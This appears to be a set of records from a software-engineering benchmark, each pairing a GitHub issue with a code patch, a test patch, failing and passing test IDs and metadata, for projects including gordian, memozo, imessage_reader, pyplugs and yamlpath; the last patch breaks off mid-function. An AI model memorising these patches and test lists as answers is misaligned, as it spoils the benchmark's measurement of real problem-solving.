If I understand the model implementation correctly, the model is run with beta prior to the current date and beta_t after, where beta_t is the beta corrected for social isolation (suppression of the contact rate). While this may be true in a new pandemic, it is not true in this case: isolation started in many places ~2 weeks ago, which is when the first cases started to appear.
### Additional details
I am pretty sure what I described is true when the model is run with a given doubling time; I am not so sure that this is also what happens in the optimized model (when given a first hospitalization date).
### Suggested fix
beta_t could be used as a default, or linked to a user input date
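A simplified, self-contained sketch of the approach the patch takes: the simulation walks a list of (beta, n_days) policies, so the unmitigated beta applies before the mitigation date and beta_t afterwards. Plain forward-Euler steps, no population rescaling; the function name is hypothetical.

```py
def run_piecewise_sir(s, i, r, gamma, policies):
    """Forward-Euler SIR where `policies` is a list of (beta, n_days) phases,
    e.g. [(beta, days_before_mitigation), (beta_t, days_after_mitigation)]."""
    s, i, r = float(s), float(i), float(r)
    history = [(s, i, r)]
    for beta, n_days in policies:
        for _ in range(n_days):
            new_infections = beta * s * i
            recoveries = gamma * i
            s, i, r = s - new_infections, i + new_infections - recoveries, r + recoveries
            history.append((s, i, r))
    return history
```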
|
0.0
|
e6ff8aaa0be2be7c27ec9b98611147650d414270
|
[
"[",
"[100%]",
"tests/penn_chime/test_models.py::test_model_raw_end",
"tests/penn_chime/test_models.py::test_model_conservation",
"tests/penn_chime/test_models.py::test_sim_sir",
"tests/penn_chime/test_models.py::test_model_cumulative_census",
"tests/penn_chime/test_models.py::test_model",
"tests/penn_chime/test_models.py::test_model_first_hosp_fit",
"tests/penn_chime/test_models.py::test_model_monotonicity"
] |
[
"tests/penn_chime/test_models.py::test_growth_rate",
"tests/penn_chime/test_models.py::test_sir"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-04-01 20:18:49+00:00
|
mit
| 146
|
|
argoproj-labs__gordian-42
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index cab46c1..eafba89 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,11 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com),
and this project adheres to [Semantic Versioning](https://semver.org).
+
+## [3.7.0] - 2023-10-18
+### Added
+- Added support to pass in a path when calling get_files(), resolves issue #34
+
## [3.6.0] - 2023-10-06
### Fix
- Fetch repo content from target branch
diff --git a/gordian/repo.py b/gordian/repo.py
index ae72642..0c53a0b 100644
--- a/gordian/repo.py
+++ b/gordian/repo.py
@@ -77,9 +77,9 @@ class Repo:
return PlainTextFile(file, self)
- def get_files(self):
+ def get_files(self, path=''):
if not self.files:
- contents = self._get_repo_contents('')
+ contents = self._get_repo_contents(path)
while contents:
file = contents.pop(0)
|
argoproj-labs/gordian
|
5924837aac8e416abd170bebd8c3ccac614b1fd5
|
diff --git a/tests/test_repo.py b/tests/test_repo.py
index 4398ec0..a341ea1 100644
--- a/tests/test_repo.py
+++ b/tests/test_repo.py
@@ -191,6 +191,16 @@ class TestRepo(unittest.TestCase):
repo._source_repo.delete_file.assert_called_once()
self.assertTrue(repo.dirty)
+ def test_get_files_with_path(self):
+ self.repo._set_target_branch('target')
+ self.repo.files = []
+ self.repo._source_repo = MagicMock()
+ repository_file = MagicMock(path='test/afile.txt', type='not_dir')
+ self.repo._source_repo.get_contents.side_effect = [[MagicMock(path='directory', type='dir')],[repository_file]]
+ self.repo.get_files('test')
+ self.repo._source_repo.get_contents.assert_has_calls([call('test', 'target'), call('directory', 'target')])
+ self.assertEquals(self.repo.files, [repository_file])
+
def test__get_github_client(self):
repo = Repo('test_repo', branch='', github=self.mock_git)
|
Fetching of all files
It appears gordian is fetching all the files of a repo even if you only need one.
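A sketch of the narrower fetch the patch enables (repository name and path are hypothetical; it assumes GitHub credentials are available in the environment):

```py
from gordian.repo import Repo

repo = Repo('my-org/my-repo', branch='main')   # hypothetical repository
files = repo.get_files('charts/my-service')    # only walks this subdirectory
```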
|
0.0
|
5924837aac8e416abd170bebd8c3ccac614b1fd5
|
[
"tests/test_repo.py::TestRepo::test_get_files_with_path"
] |
[
"tests/test_repo.py::TestRepo::test__get_github_client",
"tests/test_repo.py::TestRepo::test_create_file",
"tests/test_repo.py::TestRepo::test_create_pr",
"tests/test_repo.py::TestRepo::test_create_pr_no_labels",
"tests/test_repo.py::TestRepo::test_default_github_url",
"tests/test_repo.py::TestRepo::test_delete_file",
"tests/test_repo.py::TestRepo::test_fork",
"tests/test_repo.py::TestRepo::test_get_existing_object",
"tests/test_repo.py::TestRepo::test_get_files",
"tests/test_repo.py::TestRepo::test_get_new_version_major",
"tests/test_repo.py::TestRepo::test_get_new_version_minor",
"tests/test_repo.py::TestRepo::test_get_new_version_patch",
"tests/test_repo.py::TestRepo::test_get_object_does_not_exist",
"tests/test_repo.py::TestRepo::test_init_with_passed_token",
"tests/test_repo.py::TestRepo::test_init_with_token_from_env",
"tests/test_repo.py::TestRepo::test_init_with_user_pass_env",
"tests/test_repo.py::TestRepo::test_make_branch_fork",
"tests/test_repo.py::TestRepo::test_make_branch_no_fork",
"tests/test_repo.py::TestRepo::test_new_files_object",
"tests/test_repo.py::TestRepo::test_no_fork",
"tests/test_repo.py::TestRepo::test_override_github_url",
"tests/test_repo.py::TestRepo::test_remove_dot_git_from_repo_name",
"tests/test_repo.py::TestRepo::test_set_target_branch",
"tests/test_repo.py::TestRepo::test_set_target_branch_reset_file_cache",
"tests/test_repo.py::TestRepo::test_set_target_branch_source_branch"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-05-16 21:53:32+00:00
|
apache-2.0
| 1,098
|
|
sotetsuk__memozo-21
|
diff --git a/memozo/memozo.py b/memozo/memozo.py
index a67bbe5..e4e3311 100644
--- a/memozo/memozo.py
+++ b/memozo/memozo.py
@@ -76,3 +76,32 @@ class Memozo(object):
return _wrapper
return wrapper
+
+ def pickle(self, name=None, ext='pickle', protocol=None):
+
+ def wrapper(func):
+ _name = func.__name__ if name is None else name
+
+ @functools.wraps(func)
+ def _wrapper(*args, **kwargs):
+ args = utils.get_bound_args(func, *args, **kwargs)
+ args_str = utils.get_args_str(args)
+ sha1 = utils.get_hash(_name, func.__name__, args_str)
+ file_path = os.path.join(self.base_path, "{}_{}.{}".format(_name, sha1, ext))
+
+ if utils.log_exisits(self.base_path, _name, func.__name__, args_str) and os.path.exists(file_path):
+ with open(file_path, 'rb') as f:
+ obj = pickle.load(f)
+ return obj
+
+ obj = func(*args, **kwargs)
+
+ with open(file_path, 'wb') as f:
+ pickle.dump(obj, f, protocol=protocol)
+ utils.write(self.base_path, _name, func.__name__, args_str)
+
+ return obj
+
+ return _wrapper
+
+ return wrapper
|
sotetsuk/memozo
|
a0d0985f445279d2c0ae295e9488556cf6507f9f
|
diff --git a/tests/test_memozo.py b/tests/test_memozo.py
index e224e0a..4c39e59 100644
--- a/tests/test_memozo.py
+++ b/tests/test_memozo.py
@@ -1,6 +1,7 @@
import os
import unittest
import codecs
+import pickle
from memozo import Memozo, utils
@@ -115,3 +116,30 @@ class TestMemozoGenerator(unittest.TestCase):
def test_load_data_from_cache(self):
# TODO(sotetsuk): WRITE THIS TEST
pass
+
+
+class TestMemozoPickle(unittest.TestCase):
+
+ def test_no_cache_output(self):
+ base_path = './tests/resources'
+ m = Memozo(base_path)
+
+ @m.pickle('pickle_test', protocol=pickle.HIGHEST_PROTOCOL)
+ def pickle_test_func():
+ return {'a': 3, 'b': 5}
+
+ expected = {'a': 3, 'b': 5}
+ actual = pickle_test_func()
+ self.assertTrue(actual == expected)
+
+ sha1 = utils.get_hash('pickle_test', 'pickle_test_func', '')
+ file_path = os.path.join(base_path, "{}_{}.{}".format('pickle_test', sha1, 'pickle'))
+ os.remove(file_path)
+
+ def test_data_cached_collectly(self):
+ # TODO(sotetsuk): WRITE THIS TEST
+ pass
+
+ def test_load_data_from_cache(self):
+ # TODO(sotetsuk): WRITE THIS TEST
+ pass
|
implement pickle
```py
@m.pickle()
```
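A usage sketch based on the patch and its test (the cache directory is hypothetical and assumed to exist):

```py
import pickle
from memozo import Memozo

m = Memozo('./cache')  # hypothetical cache directory

@m.pickle('expensive_result', protocol=pickle.HIGHEST_PROTOCOL)
def compute():
    return {'a': 3, 'b': 5}

compute()  # first call runs the function and pickles the result
compute()  # second call is served from the cached pickle file
```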
|
0.0
|
a0d0985f445279d2c0ae295e9488556cf6507f9f
|
[
"tests/test_memozo.py::TestMemozoPickle::test_no_cache_output"
] |
[
"tests/test_memozo.py::TestMemozoCall::test_args",
"tests/test_memozo.py::TestMemozoCall::test_call",
"tests/test_memozo.py::TestMemozoCall::test_doc_string",
"tests/test_memozo.py::TestMemozoCall::test_set_name",
"tests/test_memozo.py::TestMemozoGenerator::test_data_cached_collectly",
"tests/test_memozo.py::TestMemozoGenerator::test_load_data_from_cache",
"tests/test_memozo.py::TestMemozoGenerator::test_no_cache_output",
"tests/test_memozo.py::TestMemozoPickle::test_data_cached_collectly",
"tests/test_memozo.py::TestMemozoPickle::test_load_data_from_cache"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-01-20 03:32:25+00:00
|
mit
| 5,603
|
|
niftycode__imessage_reader-12
|
diff --git a/imessage_reader/create_sqlite.py b/imessage_reader/create_sqlite.py
index 2c2aedc..1bf6d24 100644
--- a/imessage_reader/create_sqlite.py
+++ b/imessage_reader/create_sqlite.py
@@ -5,7 +5,7 @@
Create a SQLite3 database containing iMessage data (user id, text, date, service)
Python 3.8+
Date created: April 30th, 2021
-Date modified: August 7th, 2021
+Date modified: August 28th, 2021
"""
import sqlite3
@@ -41,11 +41,12 @@ class CreateDatabase:
message TEXT,
date TEXT,
service TEXT,
- destination_caller_id TEXT)''')
+ destination_caller_id TEXT,
+ is_from_me TEXT)''')
for data in self.imessage_data:
- cur.execute('''INSERT INTO Messages (user_id, message, date, service, destination_caller_id)
- VALUES(?, ?, ?, ?, ?)''', (data.user_id, data.text, data.date, data.service, data.account))
+ cur.execute('''INSERT INTO Messages (user_id, message, date, service, destination_caller_id, is_from_me)
+ VALUES(?, ?, ?, ?, ?, ?)''', (data.user_id, data.text, data.date, data.service, data.account, data.is_from_me))
conn.commit()
cur.close()
diff --git a/imessage_reader/fetch_data.py b/imessage_reader/fetch_data.py
index 30501e1..6e6f0f2 100644
--- a/imessage_reader/fetch_data.py
+++ b/imessage_reader/fetch_data.py
@@ -7,7 +7,7 @@ Python 3.8+
Author: niftycode
Modified by: thecircleisround
Date created: October 8th, 2020
-Date modified: August 6th, 2021
+Date modified: August 28th, 2021
"""
import sys
@@ -28,6 +28,7 @@ class MessageData:
date: str
service: str
account: str
+ is_from_me: str
def __str__(self):
"""
@@ -37,7 +38,8 @@ class MessageData:
f"message: {self.text}\n" \
f"date: {self.date}\n" \
f"service: {self.service}\n" \
- f"destination caller id: {self.account}\n"
+ f"destination caller id: {self.account}\n "\
+ f"is_from_me: {self.is_from_me}\n"
# noinspection PyMethodMayBeStatic
@@ -55,7 +57,8 @@ class FetchData:
"datetime((date / 1000000000) + 978307200, 'unixepoch', 'localtime')," \
"handle.id, " \
"handle.service, " \
- "message.destination_caller_id " \
+ "message.destination_caller_id, " \
+ "message.is_from_me "\
"FROM message " \
"JOIN handle on message.handle_id=handle.ROWID"
@@ -77,7 +80,7 @@ class FetchData:
data = []
for row in rval:
- data.append(MessageData(row[2], row[0], row[1], row[3], row[4]))
+ data.append(MessageData(row[2], row[0], row[1], row[3], row[4], row[5]))
return data
@@ -137,6 +140,8 @@ class FetchData:
dates = []
service = []
account = []
+ is_from_me = []
+
for data in fetched_data:
users.append(data.user_id)
@@ -144,7 +149,8 @@ class FetchData:
dates.append(data.date)
service.append(data.service)
account.append(data.account)
+ is_from_me.append(data.is_from_me)
- data = list(zip(users, messages, dates, service, account))
+ data = list(zip(users, messages, dates, service, account, is_from_me))
return data
diff --git a/imessage_reader/write_excel.py b/imessage_reader/write_excel.py
index 47412f9..3f88a6d 100644
--- a/imessage_reader/write_excel.py
+++ b/imessage_reader/write_excel.py
@@ -6,7 +6,7 @@
Write Excel file containing iMessage data (user id, text, date, service, account)
Python 3.8+
Date created: October 1st, 2020
-Date modified: August 7th, 2021
+Date modified: August 28th, 2021
"""
from datetime import datetime
@@ -40,6 +40,7 @@ class ExelWriter:
dates = []
services = []
accounts = []
+ is_from_me = []
for data in self.imessage_data:
users.append(data.user_id)
@@ -47,6 +48,7 @@ class ExelWriter:
dates.append(data.date)
services.append(data.service)
accounts.append(data.account)
+ is_from_me.append(data.is_from_me)
# Call openpyxl.Workbook() to create a new blank Excel workbook
workbook = openpyxl.Workbook()
@@ -75,6 +77,9 @@ class ExelWriter:
sheet['E1'] = 'Destination Caller ID'
sheet['E1'].font = bold16font
+ sheet['F1'] = 'Is From Me'
+ sheet['F1'].font = bold16font
+
# Write users to 1st column
users_row = 2
for user in users:
@@ -105,6 +110,12 @@ class ExelWriter:
sheet.cell(row=account_row, column=5).value = account
account_row += 1
+ # Write is_from_me to 6th column
+ is_from_me_row = 2
+ for from_me in is_from_me:
+ sheet.cell(row=is_from_me_row, column=6).value = from_me
+ is_from_me_row += 1
+
# Save the workbook (excel file)
try:
workbook.save(self.file_path + f'iMessage-Data_{datetime.now().strftime("%Y-%m-%d")}.xlsx')
|
niftycode/imessage_reader
|
3a972bebf1c16e02e12322d3e81a7ea60400d5a2
|
diff --git a/tests/test_create_sqlite.py b/tests/test_create_sqlite.py
index a0a3f35..673a51c 100644
--- a/tests/test_create_sqlite.py
+++ b/tests/test_create_sqlite.py
@@ -18,7 +18,8 @@ def message_data_one_row():
text='Hello Max!',
date='2021-04-11 17:02:34',
service='iMessage',
- account='+01 555 17172')]
+ account='+01 555 17172',
+ is_from_me = 1)]
return message_data_list
diff --git a/tests/test_message_data.py b/tests/test_message_data.py
index fe8acf8..5b99916 100644
--- a/tests/test_message_data.py
+++ b/tests/test_message_data.py
@@ -14,7 +14,8 @@ def message_data_one_row():
'Hello!',
'2020-10-27 17:19:20',
'SMS',
- '+01 555 17172')
+ '+01 555 17172',
+ 1)
@pytest.fixture(scope='function')
@@ -31,17 +32,19 @@ def initialize_db(tmpdir):
text TEXT UNIQUE,
date TEXT UNIQUE,
service TEXT UNIQUE,
- account TEXT UNIQUE
+ account TEXT UNIQUE,
+ is_from_me INTEGER
);
''')
- cur.execute('''INSERT OR IGNORE INTO message(user_id, text, date, service, account)
- VALUES ( ?, ?, ?, ?, ?)''',
+ cur.execute('''INSERT OR IGNORE INTO message(user_id, text, date, service, account, is_from_me)
+ VALUES ( ?, ?, ?, ?, ?, ?)''',
('max@mustermann.de',
'Hello Kendra!',
'2020-10-27 17:19:20',
'iMessage',
- '+01 555 17172'))
+ '+01 555 17172',
+ 1))
conn.commit()
@@ -54,7 +57,7 @@ def test_message_data(message_data_one_row):
def test_db_data(initialize_db):
- sql_command = 'SELECT user_id, text, date, service, account from message'
+ sql_command = 'SELECT user_id, text, date, service, account, is_from_me from message'
rval = common.fetch_db_data(initialize_db, sql_command)
assert(isinstance(rval, list))
assert(isinstance(rval[0][0], str))
@@ -62,3 +65,4 @@ def test_db_data(initialize_db):
assert (isinstance(rval[0][2], str))
assert (isinstance(rval[0][3], str))
assert (isinstance(rval[0][4], str))
+ assert (isinstance(rval[0][5], int))
diff --git a/tests/test_write_excel.py b/tests/test_write_excel.py
index 8ba4092..aaa6816 100644
--- a/tests/test_write_excel.py
+++ b/tests/test_write_excel.py
@@ -19,7 +19,8 @@ def message_data_one_row():
text='Hello!',
date='2020-10-27 17:19:20',
service='SMS',
- account='+01 555 17172')]
+ account='+01 555 17172',
+ is_from_me=1)]
return message_data_list
|
Add ability to filter sent/received messages
Awesome app! Thanks for putting it together. I've been able to access both the Excel and SQLite output it creates to look at my messages. My only problem (right now) is that I can't figure out a way to tell if I sent or received a message. I can filter by `sender` to isolate conversations to an individual text thread, but without any context it's hard to tell whether I sent the message or received it.
You might be able to use the `is_from_me` column on the `message` table in the original database to add a flag or some logic based on it. I'm going to keep looking into it a little myself, but thanks again for putting this together!
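A sketch of reading that flag back out of the SQLite file produced by `create_sqlite.py` (the database file name is hypothetical; the flag may come back as text, hence the string comparison):

```py
import sqlite3

conn = sqlite3.connect('iMessage.db')  # hypothetical output of CreateDatabase
rows = conn.execute("SELECT user_id, message, is_from_me FROM Messages").fetchall()
for user_id, message, is_from_me in rows:
    direction = 'sent' if str(is_from_me) == '1' else 'received'
    print(direction, user_id, message)
```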
|
0.0
|
3a972bebf1c16e02e12322d3e81a7ea60400d5a2
|
[
"tests/test_create_sqlite.py::test_create_sqlite",
"tests/test_message_data.py::test_message_data",
"tests/test_write_excel.py::test_write_excel"
] |
[
"tests/test_message_data.py::test_db_data"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-08-28 17:04:02+00:00
|
mit
| 4,168
|
|
gahjelle__pyplugs-29
|
diff --git a/pyplugs/_plugins.py b/pyplugs/_plugins.py
index ca0d4d1..38f4434 100644
--- a/pyplugs/_plugins.py
+++ b/pyplugs/_plugins.py
@@ -141,7 +141,7 @@ def exists(package: str, plugin: str) -> bool:
try:
_import(package, plugin)
- except _exceptions.UnknownPluginError:
+ except (_exceptions.UnknownPluginError, _exceptions.UnknownPackageError):
return False
else:
return package in _PLUGINS and plugin in _PLUGINS[package]
@@ -175,6 +175,10 @@ def _import(package: str, plugin: str) -> None:
raise _exceptions.UnknownPluginError(
f"Plugin {plugin!r} not found in {package!r}"
) from None
+ elif repr(package) in err.msg: # type: ignore
+ raise _exceptions.UnknownPackageError(
+ f"Package {package!r} does not exist"
+ ) from None
raise
|
gahjelle/pyplugs
|
bd98efd851c820c6bc89e2b8b73f49956ddceb36
|
diff --git a/tests/test_plugins.py b/tests/test_plugins.py
index 35e6f7d..82aea8b 100644
--- a/tests/test_plugins.py
+++ b/tests/test_plugins.py
@@ -81,6 +81,12 @@ def test_exists(plugin_package):
assert pyplugs.exists(plugin_package, "non_existent") is False
+def test_exists_on_non_existing_package():
+ """Test that exists() correctly returns False for non-existing packages"""
+ assert pyplugs.exists("non_existent_package", "plugin_parts") is False
+ assert pyplugs.exists("non_existent_package", "non_existent") is False
+
+
def test_call_existing_plugin(plugin_package):
"""Test that calling a test-plugin works, and returns a string"""
plugin_name = pyplugs.names(plugin_package)[0]
|
`.exists()` crashes for non-existing packages
When using `pyplugs.exists()` with a package that doesn't exist, `pyplugs` crashes instead of returning `False`
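A minimal reproduction sketch (the package name is made up); the call below should simply report `False`, but currently an exception escapes instead:

```python
import pyplugs

# Expected: False for a package that does not exist.
# Observed: an unhandled error bubbles up from the import machinery.
print(pyplugs.exists("non_existent_package", "some_plugin"))
```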
|
0.0
|
bd98efd851c820c6bc89e2b8b73f49956ddceb36
|
[
"tests/test_plugins.py::test_exists_on_non_existing_package"
] |
[
"tests/test_plugins.py::test_package_not_empty",
"tests/test_plugins.py::test_package_empty",
"tests/test_plugins.py::test_list_funcs",
"tests/test_plugins.py::test_package_non_existing",
"tests/test_plugins.py::test_plugin_exists",
"tests/test_plugins.py::test_plugin_not_exists[no_plugins]",
"tests/test_plugins.py::test_plugin_not_exists[non_existent]",
"tests/test_plugins.py::test_exists",
"tests/test_plugins.py::test_call_existing_plugin",
"tests/test_plugins.py::test_call_non_existing_plugin",
"tests/test_plugins.py::test_ordered_plugin",
"tests/test_plugins.py::test_default_part",
"tests/test_plugins.py::test_call_non_existing_func",
"tests/test_plugins.py::test_short_doc",
"tests/test_plugins.py::test_long_doc",
"tests/test_plugins.py::test_names_factory",
"tests/test_plugins.py::test_funcs_factory",
"tests/test_plugins.py::test_info_factory",
"tests/test_plugins.py::test_exists_factory",
"tests/test_plugins.py::test_get_factory",
"tests/test_plugins.py::test_call_factory"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-04-18 09:58:01+00:00
|
mit
| 2,432
|
|
wwkimball__yamlpath-155
|
diff --git a/CHANGES b/CHANGES
index 1e09b97..afa9061 100644
--- a/CHANGES
+++ b/CHANGES
@@ -1,3 +1,8 @@
+3.6.4
+Bug Fixes:
+* Refactored single-star wildcard segment (*) handling to enable filtering
+ matches when subsequent segments exist; this fixes Issue #154.
+
3.6.3
Bug Fixes:
* The eyaml-rotate-keys command-line tool failed to preserve block-style EYAML
diff --git a/yamlpath/__init__.py b/yamlpath/__init__.py
index 17f456c..a47c822 100644
--- a/yamlpath/__init__.py
+++ b/yamlpath/__init__.py
@@ -1,6 +1,6 @@
"""Core YAML Path classes."""
# Establish the version number common to all components
-__version__ = "3.6.3"
+__version__ = "3.6.4"
from yamlpath.yamlpath import YAMLPath
from yamlpath.processor import Processor
diff --git a/yamlpath/enums/pathsegmenttypes.py b/yamlpath/enums/pathsegmenttypes.py
index 489d9e0..4c9a402 100644
--- a/yamlpath/enums/pathsegmenttypes.py
+++ b/yamlpath/enums/pathsegmenttypes.py
@@ -36,6 +36,9 @@ class PathSegmentTypes(Enum):
Traverses the document tree deeply. If there is a next segment, it
must match or no data is matched. When there is no next segment, every
leaf node matches.
+
+ `MATCH_ALL`
+ Matches every immediate child node.
"""
ANCHOR = auto()
@@ -45,3 +48,4 @@ class PathSegmentTypes(Enum):
SEARCH = auto()
TRAVERSE = auto()
KEYWORD_SEARCH = auto()
+ MATCH_ALL = auto()
diff --git a/yamlpath/processor.py b/yamlpath/processor.py
index 7c97027..38e301c 100644
--- a/yamlpath/processor.py
+++ b/yamlpath/processor.py
@@ -839,6 +839,11 @@ class Processor:
node_coords = self._get_nodes_by_index(
data, yaml_path, segment_index,
translated_path=translated_path, ancestry=ancestry)
+ elif segment_type == PathSegmentTypes.MATCH_ALL:
+ node_coords = self._get_nodes_by_match_all(
+ data, yaml_path, segment_index, parent=parent,
+ parentref=parentref, translated_path=translated_path,
+ ancestry=ancestry)
elif segment_type == PathSegmentTypes.ANCHOR:
node_coords = self._get_nodes_by_anchor(
data, yaml_path, segment_index,
@@ -1894,6 +1899,244 @@ class Processor:
data=node_coord)
yield node_coord
+ def _get_nodes_by_match_all_unfiltered(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield every immediate, non-leaf child node.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all_unfiltered: "
+ parent: Any = kwargs.pop("parent", None)
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+ segments = yaml_path.escaped
+ pathseg: PathSegment = segments[segment_index]
+
+ self.logger.debug(
+ "Gathering ALL immediate children in the tree at parentref,"
+ f" {parentref}, in data:",
+ prefix=dbg_prefix, data=data)
+
+ if isinstance(data, (CommentedMap, dict)):
+ self.logger.debug(
+ "Iterating over all keys to find ANY matches in data:",
+ prefix=dbg_prefix, data=data)
+ for key, val in data.items():
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ key, translated_path.seperator))
+ next_ancestry = ancestry + [(data, key)]
+ self.logger.debug(
+ f"Yielding dict value at key, {key} from data:",
+ prefix=dbg_prefix, data={'VAL': val, 'OF_DATA': data})
+ yield NodeCoords(val, data, key, next_translated_path,
+ next_ancestry, pathseg)
+ return
+
+ if isinstance(data, (CommentedSeq, list)):
+ for idx, ele in enumerate(data):
+ next_translated_path = translated_path + f"[{idx}]"
+ next_ancestry = ancestry + [(data, idx)]
+ self.logger.debug(
+ f"Yielding list element at index, {idx}:",
+ prefix=dbg_prefix, data=ele)
+ yield NodeCoords(ele, data, idx, next_translated_path,
+ next_ancestry, pathseg)
+ return
+
+ if isinstance(data, (CommentedSet, set)):
+ for ele in data:
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ ele, translated_path.seperator))
+ self.logger.debug(
+ "Yielding set element:",
+ prefix=dbg_prefix, data=ele)
+ yield NodeCoords(
+ ele, parent, ele, next_translated_path, ancestry, pathseg)
+ return
+
+ self.logger.debug(
+ "NOT yielding Scalar node (* excludes scalars):",
+ prefix=dbg_prefix, data=data)
+ return
+
+ def _get_nodes_by_match_all_filtered(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield immediate child nodes whose children match additional filters.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all_filtered: "
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+ segments = yaml_path.escaped
+ pathseg: PathSegment = segments[segment_index]
+ next_segment_idx: int = segment_index + 1
+
+ self.logger.debug(
+ "FILTERING children in the tree at parentref,"
+ f" {parentref}, of data:",
+ prefix=dbg_prefix, data=data)
+
+ # There is a filter on this segment. Return nodes from the present
+ # data if-and-only-if any of their immediate children will match the
+ # filter. Do not return the child nodes; the caller will continue to
+ # process subsequent path segments to yield them.
+ if isinstance(data, dict):
+ self.logger.debug(
+ "Iterating over all keys to find ANY matches in data:",
+ prefix=dbg_prefix, data=data)
+ for key, val in data.items():
+ next_translated_path = (
+ translated_path + YAMLPath.escape_path_section(
+ key, translated_path.seperator))
+ next_ancestry = ancestry + [(data, key)]
+ for filtered_nc in self._get_nodes_by_path_segment(
+ val, yaml_path, next_segment_idx, parent=data,
+ parentref=key, translated_path=next_translated_path,
+ ancestry=next_ancestry
+ ):
+ self.logger.debug(
+ "Ignoring yielded child node coordinate to yield its"
+ " successfully matched, filtered dict val parent for"
+ f" key, {key}:"
+ , prefix=dbg_prefix
+ , data={
+ 'VAL': val
+ , 'OF_DATA': data
+ , 'IGNORING': filtered_nc
+ })
+ yield NodeCoords(
+ val, data, key, next_translated_path, next_ancestry,
+ pathseg
+ )
+ break # because we need only the matching parent
+ return
+
+ if isinstance(data, list):
+ for idx, ele in enumerate(data):
+ self.logger.debug(
+ f"Recursing into INDEX '{idx}' at ref '{parentref}' for"
+ " next-segment matches...", prefix=dbg_prefix)
+ next_translated_path = translated_path + f"[{idx}]"
+ next_ancestry = ancestry + [(data, idx)]
+ for filtered_nc in self._get_nodes_by_path_segment(
+ ele, yaml_path, next_segment_idx, parent=data,
+ parentref=idx, translated_path=next_translated_path,
+ ancestry=next_ancestry
+ ):
+ self.logger.debug(
+ "Ignoring yielded child node coordinate to yield its"
+ " successfully matched, filtered list ele parent for"
+ f" idx, {idx}:"
+ , prefix=dbg_prefix
+ , data={
+ 'ELE': ele
+ , 'OF_DATA': data
+ , 'IGNORING': filtered_nc
+ })
+ yield NodeCoords(
+ ele, data, idx, next_translated_path, next_ancestry,
+ pathseg
+ )
+ break # because we need only the matching parent
+ return
+
+ def _get_nodes_by_match_all(
+ self, data: Any, yaml_path: YAMLPath, segment_index: int, **kwargs: Any
+ ) -> Generator[Any, None, None]:
+ """
+ Yield every immediate child node.
+
+ Parameters:
+ 1. data (ruamel.yaml data) The parsed YAML data to process
+ 2. yaml_path (yamlpath.Path) The YAML Path being processed
+ 3. segment_index (int) Segment index of the YAML Path to process
+
+ Keyword Arguments:
+ * parent (ruamel.yaml node) The parent node from which this query
+ originates
+ * parentref (Any) The Index or Key of data within parent
+ * translated_path (YAMLPath) YAML Path indicating precisely which node
+ is being evaluated
+ * ancestry (List[AncestryEntry]) Stack of ancestors preceding the
+ present node under evaluation
+
+ Returns: (Generator[Any, None, None]) Each node coordinate as they are
+ matched.
+ """
+ dbg_prefix="Processor::_get_nodes_by_match_all: "
+ parent: Any = kwargs.pop("parent", None)
+ parentref: Any = kwargs.pop("parentref", None)
+ translated_path: YAMLPath = kwargs.pop("translated_path", YAMLPath(""))
+ ancestry: List[AncestryEntry] = kwargs.pop("ancestry", [])
+
+ segments = yaml_path.escaped
+ next_segment_idx: int = segment_index + 1
+ filter_results = next_segment_idx < len(segments)
+
+ self.logger.debug(
+ "Processing either FILTERED or UNFILTERED nodes from data:"
+ , prefix=dbg_prefix, data=data)
+
+ if filter_results:
+ # Of data, yield every node which has children matching next seg
+ all_coords = self._get_nodes_by_match_all_filtered(
+ data, yaml_path, segment_index,
+ parent=parent, parentref=parentref,
+ translated_path=translated_path, ancestry=ancestry
+ )
+ else:
+ # Of data, yield every node
+ all_coords = self._get_nodes_by_match_all_unfiltered(
+ data, yaml_path, segment_index,
+ parent=parent, parentref=parentref,
+ translated_path=translated_path, ancestry=ancestry
+ )
+
+ for all_coord in all_coords:
